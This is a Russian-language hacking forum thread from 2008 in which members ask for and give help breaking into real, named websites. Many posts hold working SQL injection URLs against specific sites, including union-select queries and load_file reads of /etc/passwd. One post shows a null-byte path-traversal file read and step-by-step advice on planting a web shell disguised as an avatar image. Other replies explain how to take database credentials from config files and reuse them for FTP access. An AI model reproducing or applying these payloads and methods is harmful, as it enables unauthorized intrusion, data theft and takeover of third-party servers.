Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. SVAROG

    SVAROG Elder - Старейшина

    Joined:
    13 Feb 2007
    Messages:
    424
    Likes Received:
    86
    Reputations:
    -1
    _Pantera_ USAkid при декодировании получаеться какаой то мусор типа
    1üÔ7__ø¹7x?8!2_Ñúª_oÓÒ!?K´U$
     
  2. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    Ломаю http://kataliz.net много sql, но фильтрация обламывает.
    при коментариев /* фильтр
    при -- пропискает после себя)
    НО при %00 выдаёт следущие.


    http://kataliz.net/silencers/15%27%00

    Software error:

    HTML::Template->new() : Cannot open included file /home/katalizn/public_html/cgi-bin/Templates/Template_.tmpl : file not found. at /home/katalizn/public_html/cgi-bin/Template.pm line 1616
    HTML::Template::_init_template('HTML::Template=HASH(0x82efe14)') called at /home/katalizn/public_html/cgi-bin/Template.pm line 1189
    HTML::Template::_init('HTML::Template=HASH(0x82efe14)') called at /home/katalizn/public_html/cgi-bin/Template.pm line 1083
    HTML::Template::new('HTML::Template', 'filename', '/home/katalizn/public_html/cgi-bin/Templates/Template_.tmpl', 'global_vars', 'on', 'die_on_bad_params', 0, 'search_path_on_include', 1, ...) called at siteengine.cgi line 116


    --------------------------------------------------------------------------
    Как бы обойти фильтрацию, и что эта за ошибка? в php скриптах раскритие питей на перл!? так чтоли?
     
    #3082 tor4), 29 Aug 2008
    Last edited: 29 Aug 2008
  3. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    tor4), при чем здесь %00? Это не комментарий.

    Попробуй "#".

    Ты же сам уже ответил себе - раскрытие пути

    Сам понял что сказал? :( Если у файла расширение php - далеко не факт, что это php скрипт. htaccess никто не отменял. Тем более, если ты внимательно прочтешь ошибку, то увидишь, что идет обращение к siteengine.cgi, а там может быть и такая ошибка. Откуда ты взял вообще перл?
     
    1 person likes this.
  4. softrix

    softrix New Member

    Joined:
    5 Jul 2008
    Messages:
    16
    Likes Received:
    2
    Reputations:
    -1
    Залил шелл, но все папки и файлы кромер upload read-only, chmod не меняет права доступа.
    Т.е. все файлы читать можно, но вот переписать, удалить или перезалить шел в другую папку не выходит.

    Можно ли как-то снять защиту от записи на файлах?
     
  5. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    узнай пароль от мускула .. попробуй подключится через фтп, если получится будут все папки доступны на запись
     
  6. softrix

    softrix New Member

    Joined:
    5 Jul 2008
    Messages:
    16
    Likes Received:
    2
    Reputations:
    -1
    Хм, а как через мускул, можно пароль к фтп узнать ?
     
  7. geforse

    geforse Elder - Старейшина

    Joined:
    2 Mar 2008
    Messages:
    617
    Likes Received:
    290
    Reputations:
    1
    Помогите плизз:

    Code:
    http://www.freedancer.ru/?module=messages&page=comments&messageid=2095+order+by+1,2,3,4,5,6/*
    С SQL-Inj мало работал(
     
  8. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    1. Вот:

    Code:
    http://www.freedancer.ru/?module=messages&page=comments&messageid=2095'+and+1=2+union+select+1,2,3,4,5,6,7,8,9,unhex(hex(concat(version(),char(58),user()))),11,12--+
    2. Постить в тему с SQL инъекциями, то что ты запостил - не следовало, это не SQL инъекция - это издевательство, да и тема та не для вопросов (ну за это ты уже словил минус).

    3. Прочитай хотя бы одну статью про SQL инъекции и не смеши людей.
     
  9. nicusor

    nicusor Elder - Старейшина

    Joined:
    19 Mar 2008
    Messages:
    105
    Likes Received:
    38
    Reputations:
    0
    не через мускул, а через шелл который ты уже залил, читаешь файлы пхп смотришь конфиги для мускула. может быть тебе повезёт и пароль подойдёт к фтп.
     
  10. _Pantera_

    _Pantera_ Характерне козацтво

    Joined:
    6 Oct 2006
    Messages:
    186
    Likes Received:
    356
    Reputations:
    109
    Немного покопался я....

    PHP:
    http://www.freedancer.ru/?module=messages&page=comments&messageid=-2095'+union+select+1,2,3,4,5,6,7,8,9,AES_DECRYPT(AES_ENCRYPT(version(),0x78),0x78),11,12+from+cms_site_comments/*
    если пойти дальше, можно найти читалку файлов...

    PHP:
    http://www.freedancer.ru/?module=../../../../../../../../etc/passwd%00&cmd=list&dt=2
    как видно magic_quotes_gpc = Off, что очень радует!

    Далее регаемся, заливаем картинку с телом шелла в автару, путь будет примерно такой:

    С помощью читалки ищем дырку в каком нить скрипте, где будет возможен инклуд и инклудим сам шелл....

    вот и все =)
     
    1 person likes this.
  11. none222

    none222 Guest

    Reputations:
    0
    такая фигня. взломал сайт, залил туда шелл (мадшелл с99). а он не показывает некоторые файлы =/

    выполнял комманду ls -la - показывает все файлы (r57 показывает все)

    с чем это может быть связано?
     
  12. tor4)

    tor4) Elder - Старейшина

    Joined:
    27 May 2008
    Messages:
    45
    Likes Received:
    21
    Reputations:
    -6
    jon21
    Линк в студию))) gg
     
  13. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    Недавно при проведении скуль-инъекции возникла такая проблема - например, когда делаешь следующий запрос
    www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users/*
    Скрипт выдает рандомное имя юзера из таблы, но стоит начать использовать лимит -
    www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+limit+0,1/* или
    www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+limit+1,1/*
    То облом - скрипт ничего не выдает :( И так со всеми таблицами, что можно в таком случае сделать ?
     
  14. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    0nep@t0p
    limit+1+offset+1
    Видел как то фильтрацию "," точнее не фильтрацию, конечно , но неадекватную реакцию на неё именно в лимите :D

    Если нет, кинь линк в ПМ посмотрим
     
  15. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    2 jokester
    Нет, там точно не на запятую ибо из информэйшн схема тэиблс все норм перебиралось лимитом, а вот из других табл уже облом
    Линк кинул в пм
     
  16. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    Почему load_file() иногда доказывает содержимое дерикторий а иногда нет т.е. файлы читает а содержимое дерикторий не показывает, например load_file('/home/') дира есть а он содержимое не кажит

    и как узнать какие диры на сервере есть чтоб знать где чего прочитать можно


    ответ нашел всем спасибо)
     
    #3096 truelamer, 30 Aug 2008
    Last edited: 30 Aug 2008
  17. Nek1t

    Nek1t Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    181
    Likes Received:
    16
    Reputations:
    1
    Поделись ответом, раз нашел :)
     
  18. MirA

    MirA Member

    Joined:
    24 Jul 2008
    Messages:
    25
    Likes Received:
    16
    Reputations:
    0
    попробуй в запрос дописать +where+1=1, т.е. он будет примерно таким : www.site.com/blabla.php?id=-1+union+select+1,username,3+from+users+where+1=1+limit+1,1/*
     
    1 person likes this.
  19. truelamer

    truelamer Elder - Старейшина

    Joined:
    6 Nov 2007
    Messages:
    135
    Likes Received:
    30
    Reputations:
    5
    есть читалка файлов

    http://www.nebraska-outdoors.com/articles/article.php?aid=-1+union+select+load_file(0x2f6574632f706173737764)+from+users--


    помогите найти путь к конфику апача

    пробовал но не помогает:

    /etc/httpd/conf/
    /etc/apache/conf/
    /etc/apache/
    /etc/apache2/conf/
    /var/httpd/conf
    /var/www/conf
    /usr/local/apache/conf/
    /usr/local/apache2/conf/
    /usr/local/httpd/conf/
     
  20. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Перебирай. https://forum.antichat.ru/showpost.php?p=467361&postcount=1
    Ес-сно без ../../../ в начале.
     
    1 person likes this.
Thread Status:
Not open for further replies.